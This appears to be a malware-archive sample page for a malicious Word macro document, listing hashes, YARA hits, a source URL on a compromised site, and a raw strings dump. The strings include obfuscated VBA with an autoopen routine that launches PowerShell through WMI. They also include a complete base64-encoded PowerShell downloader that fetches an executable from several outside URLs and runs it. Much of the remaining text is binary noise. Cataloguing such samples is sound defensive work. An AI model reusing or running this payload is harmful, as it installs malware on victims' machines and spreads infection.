Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: a67808e0d29611045c35ba32ff48e23c --

Hashes
MD5: a67808e0d29611045c35ba32ff48e23c
SHA1: b0f118c9b780a39ef131502e2ad7913159a55056
SHA256: e2c0d7da5e9f1c5f10816d04997eb2b84cb2992566d062568876c96e24636c2c
SSDEEP: 3072:a77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q0PNt4LQRnfOQd:a77HUUUUUUUUUUUUUUUUUUUT52VZSLQT
Details
File Type: Composite
Yara Hits
YRP/office_document_vba | YRP/Contains_VBA_macro_code | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number |
Source
http://coebioetica.salud-oaxaca.gob.mx/wp-content/uploads/nts68xu-zmfzf-rumb/
Strings
		Z_11775_C65409u7545_5
$5BRUt
l6GYo	
IWYMQnu#YF
3!{CIl
-vmQvf5U
*7'S0V
\:Ssw:
eU=M/S
~N;xF{
ucki'm
:fj/Zv
ZgU^4u
p'G}ak
 `q:74
>0Xr95
26RC#p
MPk<*gfIx
U^4=E6
" "-wVn
JGH!iln{
muRE4N-|n
a=[)DB
qnCd{C
;{rp	*L
c$aOH4
8^7Dm;Mn
)ml/lNi
k5dU12V2
p6Ihi%
mu;'4tSV
,7=gSN
KCI-m<
+IQUSM
EkO	nq
wS-_D8e
7$D@DD
;MEmDUr
ek@{\9
e=u$|E
NNOf$D
TtV}Oc
=]=45-
W[A=-=%4`=
SrvCNn
+)$hsf
7Qi*-E`
m]S]QE5
jZjN e
anC{p8
GW#K_W3
oDxYK	
}=u\|A
Ed3Y'3
=]=45-
Pz1WSMK
:jz^0e
Z/CWC_GA-m|
}d<]C*'
MEeD53u
e}=-]m
-ip`$d
_/I-#6
0cO,`1
d9p,.'
MEeD53u
I'n@DD
"(?\j+
_5;cv#n
e5Z7BSz
9'!~w=
*)j#tR
i~8l~,?
[RW\xkm
W6jm9A
_OI=[6
02O2Oi'
}=ueoY
w='GR	
(oY#X^G
sy-FM1O
mCGckx
m%>G8Aht
i-BId 
:v{C*`
"lQD2xZ
Or`|14
.-po	'
`-`h##
A"Uk[%&
r\ZAa$
PR\)h&
0mE#I>
$nzCFm
iwf0Ii
K	&8dn
x[[['[#s
_MKPid
0mE#I>
9/7_tr
$nzCFm
iX*aqo	
r%5EoE
	2]OA;DY$
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
$4vq^W
MB[F7x"
>Yr]H+
a!e9#i
An7jah
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Project
G{000204
46}#2.0#
0#C:\Win
dows\sys@tem32\
.tlb#OLE
 Automat
EOffDic
DF8D04C-
5BFA-101@B-BDE5
ram File
s\Common
Microso
ft Share
d\OFFICE
16\MSO.D
M 16 .0 Ob
ibrary
MSForms>
452EE1-E
-02608C4
FM20L'B
D3F9F38-
-48A3-
AE60-38A
E7491F39
6Users\
ADMINI~1
\AppData
\Local\T
emp\Word
dB .ex
7j0@52640G
u64465`62G
k6471T_8#
Y55130
Q12543G
7426_',7
b001947
o+r327V3@
T10276
R_85255
f44297
43115074
986732797
U63022
N83732
p93942
218665834
144606646
M3959_44
G0955347
I1_4100
728645759
758835993
j540721
winmgmts:Win32_ProcessStartup
X379__
N643952
493885488
227283560
b58240_
z51_5726
a73576
328081271
146380880
P69599_
V87723
u95016
251263640
159975741
k7812_17
d0209874
Z5_6330
122650399
524931456
h197903
q91033
P.Word
m69822
 true,
89976527
41375022
U4_324
", "Q"
k2954111
W25358
bleMis
267743603
860863218
n7819_
-05-15
A3_34598
K5537218
65728174
708463808
I90611
05-15T
l009460
t056179
812666603
926028968
t_4468
 : 0.0
z2016093
i79422_1
673353660
52144376
t6528860
X83621
osoft.
q55__663
705363984
932618134
h291_08
I8503478
j286432
964493506
386471797
N0972345
F5941692
M6_0_23
714426587
929776296
K94523_1
I15075
V295214
88903188
314176008
h4632670
Attribut
e VB_Nam
e = "i44
Public F
unction 
w734090(
ile J008
801_ And
 i335466
eObject 
("R_8525
$43115
f000505
q@G0_1_0
218 66583
4606646
M3959_4
qC72831_
9R099_5
8Z9G09553
hI1_410
	588359
	j5407
c169079 3(Get
Var("win
mgmts:Wi
n32_Proc
essStart up"))I
C0 09380
Lo7 12129
22Au56
b58240b
h{_z51_5
Qa7357
3280812
t7H607#9c5
*4A:9V8772]Pu
7574]!k7
r#9n908
ror - $
O35378
@z92430
d 02098^
YE8984
Yq9103a==m698
997652
B0_00384
t96047
k295411o&
;|W2535
2677436s
|8708sJo
Show idofw
8235"${&
o :43B
r11494O
q55__6
J973P_117
7p)0z8
K09452
5o)j)88P
Attribut
e VB_Nam
e = "Q12
M950421
z5578801
231383114
213146393
f107038
j25_87
I861_8
483619105
688624756
P0737212
w7_369_0
z56819
706577816
343803285
P__5__95
b9020_5
v137156
560909251
777227899
o2667707
M247284
C168_02_
5610351
963416791
I22682
D92722
U085700
510324829
550402930
i89530
I2731497
K9_908_
428548477
355109480
q6083913
v88_801
J00123
857831959
592303265
J47206
D_692484
k06017
677609100
931606268
i27826
E13633
M7_78_1
800206652
235991737
u_33526
l01278
Z3367643
150489629
789683960
Y3__8196
Attribut
e VB_Nam
e = "r32
nction c
1690793(
h292409)
   Whi
le C53_5
87 And D
081842
CreateO
bject ("
M950421"
%z55788
&231383
N2131 46393
'f1 07038
sQ52906
sj25_87
4836191
&68862
P07`37212
/343 80328
CP_`_5__9
X2_5414
Av82302[A0b902@
777 22789]Uo2`66770
{F 83_70
=J0P7534Z=M@K2
lC168_
%A|!56103~
6341679}! I2268
Yq6 75499B
i0 83960z
Sub aT
autoope
ror Resua
""$w@208E
K@9_908_
)4!`x4847
)948]$q6A<
]p37303
Z#:q89
":r5958aB
9316\060;
t10104709
`u_335o
336764
1pI896
Y7427961
i5_617
510837001
217796745
U026_4_5
w4765347
u2_19009
333769331
749270997
r46_2_
f3_31698
k938_0
968909467
365247816
a759445
k3058313
k990434
641411210
763234801
b_6_16
z83086
k531858
362066484
442434013
d870335
winmgmts:Win32_ProcessX
h581025
h5679682
787795292
610506192
Y_5975
fresh"
L66298
19-05-
b__2752
876262853
517602965
A80426
oneOOM
a856067
f514892
612882573
637978611
O346795
f883_6_8
L9043881
940702714
959123768
V44141
on", "
l50_17
05-15T
C00_4200
633505917
817515921
J82404
leHelp
Attribut
e VB_Nam
e = "T10
nction f
36620()
On Erro@r Resu
While A9
44561 An
d Z52565
eObject 
("Y74279x61"
&i 5_617
$51@083700
OU@026_4_
rz864(735
sw476534
`u2_1900
L333769
t74927
;r46_,2_
9L@@17
rj053925
9f3_316
/k938_
	968909
/36524
A	C9J57
62640.C_
4934_0 +
f6168@IG
A64818
c_0237_
n25813
uk30508313
uk9 90434
64@141121=A7@632348
Xz8308
Ik53185=]
<]!442
+d8703
Set z3
Yc`o079 3(Get#
Var("win
mgmts:Wi
n32_Proc
ess"))
q576__42
Ac482957
%h`L02
61 05061
Y_8597(% 
M52h315
b __275}
87@626285
1760296]+
A8042"U#^#A
 B9963
7 @, z_56
390, w73
i0n4_8
|a8560/[
|`f5148
3797861
!e `R5443
33945_
|Pi_6049R
`U6584
C00 C0
/\+	6@K0
pt51592/
`J8240
Attribut
e VB_Nam
e = "b00
n2581304, 0, 0, MSForms, TextBox
b_0376, 1, 1, MSForms, TextBox
f616817, 2, 2, MSForms, TextBox
A64818, 3, 3, MSForms, TextBox 
c_0237_4, 4, 4, MSForms, TextBox 
C_4934_0, 5, 5, MSForms, TextBox
Attribut
e VB_Nam
e = "j05
020906-
 False
dCr@eatabl
redecla
BE xpose
mplateDe
Bust0omiz
2Co ntrol
581304, 
MSForm
s, TextB
b_03`76, 1
616817, 
A648108, 3
C_4934_
Attribut
e VB_Nam
e = "k64
Attribut
e VB_Nam
e = "k67
Attribut
e VB_Nam
e = "u64
46562"
Attribut
e VB_Nam
e = "Y55
13012"
ID="{3BDDEECE-1AD9-467F-B4F2-23B78434E99B}"
Document=j052640/&H
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
Module1b
asdgasukgukg21gxghm
n8156181
t4818842
G27243
A1_92_@5
q14236
p_690928%
CreateObject
v672066
Y2068784h
N_51_28{
L13162
l4785810q
W9853493
d4805_6o
n30392#
a075423_
q1_986
b943516
G8750322Y+
M48915
T2_115_5
I315715
r9_1181
F15389
j_004_3`P
t86555
s2293654
u008_523Z
H8_77659 D
j1719086	
d_58_485
D05892364
G8442040!
n86122$
k39_53
j_378241z
i2611064
U4680_0
l23829
v__11774
L86_60__y
J6_4_2
H277_534
j5580_W
O67435
N9_888_8
CreateForm
AddTextbox
ActiveDocument
InlineShapes
AddOLEControlh
OLEFormatn
Height|
k6471_8
Y5513012
Q12543
k67426_j
b001947
u6446562
_B_var_t4818842[
_B_var_G27243
_B_var_A1_92_
_B_var_q14236
_B_var_p_690928
_B_var_v672066
_B_var_Y2068784
_B_var_N_51_28
_B_var_L13162}
_B_var_l4785810
_B_var_W9853493u
_B_var_d4805_6
_B_var_n30392
_B_var_q1_986
_B_var_b943516
_B_var_G8750322
_B_var_M48915CX
_B_var_T2_115_5
_B_var_I315715Q
_B_var_r9_1181
_B_var_F15389
_B_var_j_004_3
_B_var_t86555
_B_var_s2293654
_B_var_u008_523
_B_var_H8_77659
_B_var_j1719086
_B_var_d_58_485aZ
_B_var_D0589236
_B_var_G8442040
_B_var_n86122
_B_var_j_378241
_B_var_i2611064
_B_var_U4680_0^
_B_var_l23829-<
_B_var_v__11774:~
_B_var_L86_60__
_B_var_J6_4_2+A
_B_var_H277_534
_B_var_j5580_
_B_var_tb1F
MSFormsC
TextBox1
n2581304^
b_0376
f6168177
A64818^
c_0237_4_
C_4934_0H	
j052640
r3273_
c1690793-
h292409.
C53_587
D081842
P0_58471
Q52906)(
j43773
z818476_Os
X2_54143
v82302_&"
F83_70
J07534Hw
q675499
i0839604
autoopen
f41960
w03508op
S409_350
p37303
f36620
q89012
r5958_
z7611852\c
t1014709R
S6627_2#
H002448
T10276
A944561[)
Z52565
z8647351
n217196^
L02617q
j0539253f
J57944Uf
h17136_
F8488805[
F5964_
O412822
z36470
GetObjectz
q576__42
c4829571
l846182
M523151H
Create
B9963571_
z70732_Z
z_56390F
w734090
I4750_5
i4734_80k
I3903802
R5443759
F33945_a
i_6049
U65842
i44961
J008801_%s
i335466W
f000505
G0_1_0
C72831_1
R099_58
C009380
o712129
q9999_8
F392790
t76070
c554884
n908_9_+
vbError
O35378_1
z924308
k2_402
E8984130F
B0_00384
t960470
r503425 
L5570204|X
ShowWindowJk
j503_17,
c3458235
o98243
r1149435
K75820866
O2755120
Q22_61P>
h2218987@R
J973_117k
c63993iC
E469809t
j839574
00000000
ExeName32="Q7_3_910"
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="67654E7CB29CA0A0A0A0A0A0A0A0"
DPB="595B708571857185"
GC="4B49628055815581AA"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
&H00000002={000209F2-0000-0000-C000-000000000046};Word8.0;&H00000000
[Workspace]
j052640=0, 0, 0, 0, C
k6471_8=50, 50, 1410, 718, 
Y5513012=75, 75, 1435, 743, 
Q12543=100, 100, 1460, 768, 
k67426_=125, 125, 1485, 793, 
b001947=150, 150, 1510, 818, 
u6446562=175, 175, 1535, 843, 
r3273_=200, 200, 1560, 868, 
T10276=225, 225, 1585, 893, 
i44961=250, 250, 1610, 918, 
j052640
k6471_8
Y5513012
Q12543
k67426_
b001947
u6446562
r3273_
T10276
i44961
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
JAB3ADgANQA1ADIAMgBfADkAPQAnAGwAOQBfADUAOQAxADcAMAAnADsAJABBADAAOQA2ADkAOQAgAD0AIAAnADIAOQA5ACcAOwAkAEsANgA0ADgAOAAxADkAMAA9ACcAbwAxAF8AOAAyADcANwAnADsAJAB6ADMAMwA1
AF8AOQBfADAAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAMAA5ADYAOQA5ACsAJwAuAGUAeABlACcAOwAkAFYAMwA1ADEAMgA3AD0AJwBGADkAXwAwADYAMgAyACcAOwAkAE0ANAA3ADgAMQA3AF8ANwA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AGUAYABCAGAAYwBMAEkARQBOAFQAOwAkAEQANwAxADUAMwBfADAAPQAnAGgAdAB0AHAAOgAvAC8AZAByAG0AYQByAGkAbgBzAC4AYwBvAG0ALwBlAG4AZwBsAC8AcABDAEEAZABPAEwAVwBMAEoALwBAAGgAdAB0AHAAOgAvAC8AaAB5AGIAcgBpAGQAYgB1AHMAaQBuAGUAcwBzAHMAbwBsAHUAdABpAG8AbgBzAC4AYwBvAG0ALgBhAHUALwBjAGcAaQAtAGIAaQBuAC8AdAA2AHkAZQAwAGoAXwB3AHkAaABmADQAeQB3AC0AMgAvAEAAaAB0AHQAcAA6AC8ALwBkAHUAcgBhAGsAYgB1AGYAZQBjAGUAbgBnAGUAbABrAG8AeQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ARwByAEkAQgBRAFQAbgBvAE8ALwBAAGgAdAB0AHAAOgAvAC8AcABlAHIAZgBvAHIAbQBhAG4AYwBlAHYAaQB0AGEAbABpAHQAeQAuAG4AZQB0AC8AcABhAHIAdABuAGUAcgAvAHIAcQAyAHQAbwB0AHYAXwBiAHIAeQBoAGQAcQBqAGMAMgAtADEANwAzADIAMAAvAEAAaAB0AHQAcAA6AC8ALwB0AG4AcgBrAGUAbgB0AG8AbgBvAGQAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgB4AGEAbABqAG4AZQBxAF8AZgA5AHYAYwB3AHYAcwB6ADAAMwAtADAAMQA1ADgANAA1ADUAMQA5AC8AJwAuAFMAUABMAEkAdAAoACcAQAAnACkAOwAkAEUAOQA2ADIAMgAwAD0AJwB6ADgAMQA5ADcANgAnADsAZgBvAHIAZQBhAGMAaAAoACQAawA0ADUANwAwADgANwAgAGkAbgAgACQARAA3ADEANQAzAF8AMAApAHsAdAByAHkAewAkAE0ANAA3ADgAMQA3AF8ANwAuAGQATwBXAG4ATABvAEEARABmAEkATABFACgAJABrADQANQA3ADAAOAA3ACwAIAAkAHoAMwAzADUAXwA5AF8AMAApADsAJABIADMANgAwADUAMwAyADUAPQAnAEYAMAA4ADQAXwAwADAAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJAB6ADMAMwA1AF8AOQBfADAAKQAuAGwAZQBuAEcAVABIACAALQBnAGUAIAAzADkAOAA4ADgAKQAgAHsALgAoACcASQAnACsAJwBuAHYAbwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAgACQAegAzADMANQBfADkAXwAwADsAJABmADEAMwA0ADgAOQAzADAAPQAnAFoANABfADEANAAwADcAXwAnADsAYgByAGUAYQBrADsAJABmADEAOAA2ADkAOQA3ADgAPQAnAHIANwBfADIAMwAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAOABfADQAMwA2AD0AJwB2ADcAXwAxADMAXwA0ADcAJwA=
Calibri 
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
Calibri 
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
ershell 
Calibri 
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
Calibri
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
Calibri	
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
Calibri	
Normal.dotm
 CONTROL Forms.TextBox.1 \s 
 CONTROL Forms.TextBox.1 \s 
 CONTROL Forms.TextBox.1 \s 
 CONTROL Forms.TextBox.1 \s 
 CONTROL Forms.TextBox.1 \s 
 CONTROL Forms.TextBox.1 \s 
Microsoft Office Word
rich virtual override
Shaniya Jast
Massachusetts
Lemke - RomaguerR
ome Fresh Pants
Satterfield
fYeV3P
J!2jJpX
S<U2MfNk
J:~9&!
#eyi )9J4
A1D#)Jt
DW ?\>
$WKW+Z?
Ev1/u0
P|=@d\
[MwmpE
Zp7C\X
om9{8A
@x]hG+k|
X`_68wq
bv*1X-X7
" }-l8o2E
/_pE2$
S'}}>l
=`-ri+X
/^Tpo3
	97Jh"	Tr